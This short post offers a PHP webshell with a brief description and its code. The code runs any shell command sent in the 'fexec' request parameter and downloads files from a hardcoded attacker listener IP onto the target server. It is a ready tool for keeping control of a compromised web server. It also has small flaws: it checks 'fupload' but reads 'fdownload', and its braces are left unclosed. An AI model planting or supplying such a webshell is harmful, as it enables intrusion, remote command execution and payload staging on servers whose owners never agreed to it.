A simple but functional PHP webshell. It provides the ability to execute commands via the fexec GET param, as well as download files to the target with the fdownload GET param. Note that the folder to save the downloaded file as well as the server’s listener IP are hardcoded into the webshell prior to placement on the target.


if (isset($_REQUEST["fupload"])) {
    file_put_contents('/var/tmp/' . $_REQUEST["fdownload"], file_get_contents("http://<LISTENER_IP>/" . $_REQUEST["fdownload"]));
if (isset($_REQUEST["fexec"])) {
    echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";